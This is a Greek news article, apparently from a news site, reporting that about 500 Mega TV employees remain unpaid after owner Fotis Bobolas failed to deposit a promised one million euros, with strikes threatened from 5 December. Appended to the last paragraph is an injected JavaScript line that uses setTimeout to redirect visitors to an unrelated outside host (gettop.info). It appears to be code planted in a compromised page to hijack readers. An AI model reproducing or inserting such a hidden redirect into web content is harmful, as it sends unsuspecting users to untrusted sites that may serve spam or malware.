Κορυφώνεται η αγωνία στο Mega -Δεν έβαλε το ένα εκατ ο Φώτης Μπόμπολας

0
12

στις τάξεις των περίπου 500 εργαζομένων του Mega, καθώς πέρασε και η Πέμπτη και δεν είδαν να πιστώνεται ούτε ένα ευρώ στους λογαριασμούς τους. Ο Φώτης Μπόμπολας είχε υποσχεθεί την Τετάρτη στους εκπροσώπους τους ότι θα κατέθετε ένα εκατ ευρώ για να πληρωθούν ένα μισθό, καθώς και για να εξυπηρετηθούν οι οφειλές του σταθμού προς την εφορία, ωστόσο δεν υπήρξε τέτοια εξέλιξη.

Εκ των πραγμάτων, λοιπόν, η Παρασκευή αναδεικνύεται σε καθοριστική μέρα. Θα βάλει τα χρήματα που υποσχέθηκε για την πληρωμή ενός μισθού (περίπου 700 χιλ ευρώ) ο ιδιοκτήτης της Πήγασος ΑΕ; Θα καταθέσει και τις περίπου 300 χιλ ευρώ για να κλείσει η «τρύπα» με την εφορία; Η πλευρά Βαρδινογιάννη έδωσε ήδη τις 300 χιλ ευρώ που αναλογούν στο μερίδιό της, δεδομένου ότι ο Σταύρος Ψυχάρης έχει τονίσει πως δεν θα συνεισφέρει.

Τα πάντα θα κριθούν από το τι θα κάνει η οικογένεια Μπόμπολα. Οι εργαζόμενοι έχουν ξεκαθαρίσει ότι η 2α Δεκεμβρίου αποτελεί ημερομηνία -ορόσημο. Αν δεν υπάρξει θετική εξέλιξη, από τη Δευτέρα 5 Δεκεμβρίου ξεκινούν απεργίες διαρκείας. Πράγμα που σημαίνει καταρχήν μη μετάδοση διαφημίσεων, χωρίς να αποκλείεται περαιτέρω κλιμάκωση, που μπορεί να φτάσει έως την άρνηση μετάδοσης οιουδήποτε προγράμματος. Tελικές αποφάσεις στις συνελεύσεις τους αύριο Παρασκευή. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here